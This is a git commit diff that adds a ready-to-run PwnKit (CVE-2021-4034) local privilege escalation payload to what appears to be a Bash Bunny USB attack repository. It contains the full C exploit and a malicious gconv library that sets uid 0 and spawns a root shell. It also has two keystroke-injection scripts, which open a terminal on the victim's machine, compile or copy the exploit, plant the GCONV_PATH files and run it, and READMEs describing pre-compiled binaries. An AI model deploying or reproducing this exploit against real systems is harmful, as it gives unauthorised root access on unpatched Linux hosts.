Add "PwnKit Vulnerability" - LPE (#489)
* Add "PwnKit Vulnerability" - LPE The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. * Add Credits to README.MD * pwnkit: Move to shorter directory name * pwnkit: Add compiled version * pwnkit: Copy built binaries instead of compiling * make it executable * add credits Co-authored-by: Marc <foxtrot@malloc.me>pull/490/head
parent
5e95ba3d40
commit
c06fd4aa80
|
@ -0,0 +1,21 @@
|
|||
#include <unistd.h>
|
||||
|
||||
int main() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"pwnkit.so:.",
|
||||
"PATH=GCONV_PATH=.",
|
||||
"SHELL=PWNKIT",
|
||||
"CHARSET=PWNKIT",
|
||||
NULL
|
||||
};
|
||||
|
||||
execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
|
||||
|
||||
return(0);
|
||||
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void gconv() {}
|
||||
|
||||
void gconv_init() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
"/bin/sh",
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
|
||||
NULL
|
||||
};
|
||||
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
|
||||
exit(0);
|
||||
|
||||
}
|
|
@ -0,0 +1,26 @@
|
|||
# PwnKit Vulnerability - Local Privilege Escalation
|
||||
|
||||
- Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Linux
|
||||
- Category: Execution
|
||||
- Credits: Qualys Research Team
|
||||
|
||||
## Description
|
||||
|
||||
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
|
||||
|
||||
[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constant :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
|
||||
```
|
|
@ -0,0 +1,112 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
#
|
||||
# Description:
|
||||
# The Qualys Research Team has discovered a memory corruption
|
||||
# vulnerability in polkit’s pkexec, a SUID-root program that
|
||||
# is installed by default on every major Linux distribution.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: Linux
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Ubuntu 20.04.3 LTS x86_64
|
||||
# pkexec version 0.105
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Yellow quadruple blink .......................... STAGE4
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN UNITY xterm
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "mkdir /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE4
|
||||
|
||||
Q STRING "cd /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "/usr/bin/pkexec --version"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "./pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "id"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
@ -0,0 +1,21 @@
|
|||
#include <unistd.h>
|
||||
|
||||
int main() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"pwnkit.so:.",
|
||||
"PATH=GCONV_PATH=.",
|
||||
"SHELL=PWNKIT",
|
||||
"CHARSET=PWNKIT",
|
||||
NULL
|
||||
};
|
||||
|
||||
execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
|
||||
|
||||
return(0);
|
||||
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void gconv() {}
|
||||
|
||||
void gconv_init() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
"/bin/sh",
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
|
||||
NULL
|
||||
};
|
||||
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
|
||||
exit(0);
|
||||
|
||||
}
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,28 @@
|
|||
# PwnKit Vulnerability - Local Privilege Escalation - Compiled
|
||||
|
||||
- Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Linux
|
||||
- Category: Execution
|
||||
- Credits: Qualys Research Team
|
||||
|
||||
## Description
|
||||
|
||||
This is a version of the PwnKit Vulnerability Local Privilege Escalation containing pre-compiled binaries for x86_64 Linux. If you don't want to use the pre-compiled binaries or you are targetting a different architecture, please find the `PwnKit-LPE` directory.
|
||||
|
||||
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
|
||||
|
||||
[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constant :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
|
||||
```
|
|
@ -0,0 +1,116 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
#
|
||||
# Description:
|
||||
# The Qualys Research Team has discovered a memory corruption
|
||||
# vulnerability in polkit’s pkexec, a SUID-root program that
|
||||
# is installed by default on every major Linux distribution.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: Linux
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Ubuntu 20.04.3 LTS x86_64
|
||||
# pkexec version 0.105
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Yellow quadruple blink .......................... STAGE4
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN UNITY xterm
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "mkdir /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp pwnkit /tmp/pwnkit_lpe/pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE4
|
||||
|
||||
Q STRING "cd /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "/usr/bin/pkexec --version"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "chmod +x ./pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "./pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "id"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
Loading…
Reference in New Issue